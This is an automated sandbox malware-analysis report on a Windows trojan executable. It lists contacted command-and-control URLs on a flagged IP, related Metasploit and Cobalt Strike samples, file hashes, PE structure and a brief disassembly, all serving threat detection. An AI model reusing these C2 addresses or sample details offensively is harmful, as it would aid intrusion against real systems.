https://89.197.154.116:7810/dll | 20% | Virustotal |
https://89.197.154.116:7810/en_US/all.jshic | 21% | Virustotal |
https://89.197.154.116:7810/en_US/all.jsZ0 | 21% | Virustotal |
https://89.197.154.116:7810/ | 6% | Virustotal |
https://89.197.154.116:7810/l | 20% | Virustotal |
https://89.197.154.116:7810/.net | 21% | Virustotal |
https://89.197.154.116:7810// | 6% | Virustotal |
https://89.197.154.116:7810/en_US/all.jsom | 20% | Virustotal |
https://89.197.154.116:7810/en_US/all.js | 22% | Virustotal |
https://89.197.154.116/ | 21% | Virustotal |
89.197.154.116 | 23% | Virustotal |
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
89.197.154.116 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://89.197.154.116:7810/dll | A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jshic | A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564242417.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564344046.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2573493710.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2563680413.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/lla | A1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.js4 | A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/m/J | A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/ | A1E0xfcSNl.exe, 00000000.00000003.2612763222.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsM9 | A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744289857.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsG2 | A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/.net | A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsoms | A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsZ0 | A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/l | A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810// | A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsb | A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsom | A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2611121723.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/y | A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116/ | A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.js-Ce | A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/SX | A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jspData | A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsP | A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsA | A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://127.0.0.1:%u/ | A1E0xfcSNl.exe, 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.js | A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsB | A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/en_US/all.jsKi | A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://89.197.154.116:7810/m/Z | A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.197.154.116 | unknown | United Kingdom | 47474 | VIRTUAL1GB | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1532360
                                          Start date and time:2024-10-13 01:57:05 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:A1E0xfcSNl.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:f05982b55c7a85b9e71a941fe2295848.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@1/2@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 15
                                          • Number of non-executed functions: 170
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:58:03 | API Interceptor | 4051356x Sleep call for process: A1E0xfcSNl.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
89.197.154.116 | PFqt5aUVdA.exe | malicious | Metasploit | 89.197.154.116:7810/PNs7dckO50Y1jTSMUo0osQ1uzlhrQ4w81bBqoiv31D7i0A7iSY6gyr9EVXOB4Zd_KLBxkuuRLlURC5lY_QiFvZl3k3OfdCx3N5d_lJCDWWm3XEqduXYg5vki
| CEhM4s0ZoZ.exe | malicious | Metasploit | 89.197.154.116:7810/VeM-buvtRWFTY1JiNZ2fGwUXc1CJXgbyOV5zM2vQ03kY7e4nGmyXkTKa8si-g-FfyAlpzs_FKQOSCtulsk34aryu-Ou9W2coAgl4jGnvIFVlgK-MlMyEitlm
| P3KxDOMmD3.exe | malicious | CobaltStrike | 89.197.154.116:7810/cm
| file.exe | malicious | CobaltStrike | 89.197.154.116:7810/push
| file.exe | malicious | CobaltStrike | 89.197.154.116:7810/load
| file.exe | malicious | CobaltStrike | 89.197.154.116:7810/ptj
| file.exe | malicious | CobaltStrike | 89.197.154.116:7810/IE9CompatViewList.xml
| file.exe | malicious | CobaltStrike | 89.197.154.116:7810/pixel
| ZnbEj6OQ7e.exe | malicious | CobaltStrike | 89.197.154.116:7810/pixel
| YpJ4EZPgHX.exe | malicious | CobaltStrike | 89.197.154.116:7810/dpixel
                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VIRTUAL1GB | 7echqQm6T4.vbs | malicious | Metasploit | 89.197.154.116
| 21GJhzRNAS.exe | malicious | Metasploit | 89.197.154.116
| bJ7Q5TP1uG.exe | malicious | Metasploit | 89.197.154.116
| Xj6IycX0ji.exe | malicious | Metasploit | 89.197.154.116
| PFqt5aUVdA.exe | malicious | Metasploit | 89.197.154.116
| CEhM4s0ZoZ.exe | malicious | Metasploit | 89.197.154.116
| UJTBFTCNxI.exe | malicious | Metasploit | 89.197.154.116
| 0EkK2uIJb6.exe | malicious | Metasploit | 89.197.154.116
| P3KxDOMmD3.exe | malicious | CobaltStrike | 89.197.154.116
| lNymIO2RVq.vbs | malicious | Metasploit | 89.197.154.116
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\A1E0xfcSNl.exe
                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                          Category:dropped
                                          Size (bytes):71954
                                          Entropy (8bit):7.996617769952133
                                          Encrypted:true
                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                          Process:C:\Users\user\Desktop\A1E0xfcSNl.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):328
                                          Entropy (8bit):3.1295899906525917
                                          Encrypted:false
                                          SSDEEP:6:kKdFkd19UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1ycDnLNkPlE99SNxAhUe/3
                                          MD5:0970ECCA9A8A6BB348E181666D3E0D9D
                                          SHA1:7BD9E457D4DBA11CDE5D5E8A1753B11E7636DA91
                                          SHA-256:FEA3A69921A8EDD798B221B338EB7B5672AE6CA4C71FB8EDAD0B41BF6CC08700
                                          SHA-512:A707BC57D09386D1607057CE613E1825D8A9309F6AF7941D6C9AE40A2943988A4987AF22DA0F38826D4F822B3DE9CD23DB13C4FF1E55BE97821F1ACEDAF0689F
                                          Malicious:false
                                          Reputation:low
                                          Preview:p...... ........0.......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                          Entropy (8bit):7.300586660063825
                                          TrID:
                                          • Win64 Executable (generic) (12005/4) 74.80%
                                          • Generic Win/DOS Executable (2004/3) 12.49%
                                          • DOS Executable Generic (2002/1) 12.47%
                                          • VXD Driver (31/22) 0.19%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                          File name:A1E0xfcSNl.exe
                                          File size:328'704 bytes
                                          MD5:f05982b55c7a85b9e71a941fe2295848
                                          SHA1:b0df24778218a422f7a88083c9fb591f0499c36f
                                          SHA256:5462b422de6d759e45cc0269d564acbf0805c4441aba38bd28133c98d1187888
                                          SHA512:e9679915128f46745b05e21964491ee16bb6309d74e18cf6d4cb1259b40aa440f6f1ba1fe87353da9a5fd10cc5ec94e43d7e14e07a5e3cadf9c4b8a12ad30388
                                          SSDEEP:6144:ClFf2d3xRiZ6/32f1RYhG1saU1LQsFtyWHSntMC6pP98WknVyH9RqL84/:qF6BkZWU1RRs/gSU
                                          TLSH:CB64BE8A69C23DA0F98609F690248DFBD3197EFEBCF2D5604F7E8C80958F0D04D5569A
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......5-........ ............................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x4014c0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                          TLS Callbacks:0x401ba0
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:147442e63270e287ed57d33257638324
                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [0004EFF5h]
                                          mov dword ptr [eax], 00000001h
                                          call 00007F8CB8C7EB2Fh
                                          call 00007F8CB8C7E31Ah
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop word ptr [eax+eax+00000000h]
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [0004EFC5h]
                                          mov dword ptr [eax], 00000000h
                                          call 00007F8CB8C7EAFFh
                                          call 00007F8CB8C7E2EAh
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop word ptr [eax+eax+00000000h]
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          call 00007F8CB8C7FFC4h
                                          dec eax
                                          test eax, eax
                                          sete al
                                          movzx eax, al
                                          neg eax
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          lea ecx, dword ptr [00000009h]
                                          jmp 00007F8CB8C7E649h
                                          nop dword ptr [eax+00h]
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          jmp ecx
                                          dec eax
                                          arpl word ptr [00002AC2h], ax
                                          test eax, eax
                                          jle 00007F8CB8C7E698h
                                          cmp dword ptr [00002ABBh], 00000000h
                                          jle 00007F8CB8C7E68Fh
                                          dec eax
                                          mov edx, dword ptr [00052CFEh]
                                          dec eax
                                          mov dword ptr [ecx+eax], edx
                                          dec eax
                                          mov edx, dword ptr [00052CFBh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54000 | 0x8d8 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x51000 | 0x2b8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x50060 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x54224 | 0x1e8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x20a8 | 0x2200 | ba98beafce4128c14539a20f3e854b25 | False | 0.5734145220588235 | data | 6.010394259460846 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0x4bcf0 | 0x4be00 | 07413092d6d99f07613d3dc3053a5c91 | False | 0.624594573723229 | dBase III DBT, version number 0, next free block index 10, 1st item "\337m\242\335\337m\242\335\337m\242\335\337\206\241\335\257m\242\335\337m\242\335\337m\242\335\337M\241\335\257k\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\361\031\307\245\253m\242\335]l\241\335\337}\242\335\337o\241\335\337i\242\335\337m\242\335\337m\242\335\337m\242\335\377m\242\275\361\037\306\274\253\014\242\335\335\221\242\335\337M\241\335\337\223\242\335\337k\241\335\337m\242" | 7.291570433023368 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x50000 | 0x910 | 0xa00 | 5fcc7830b4dcd602b35eeb7f1712e8fa | False | 0.241796875 | data | 4.459688665734325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x51000 | 0x2b8 | 0x400 | f88aef14dea168f37249daf0dce04c78 | False | 0.37890625 | data | 3.2311971178670404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x52000 | 0x238 | 0x400 | 6ce9e303fb86766d702ecb2b174cf348 | False | 0.2578125 | data | 2.6337753778508075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
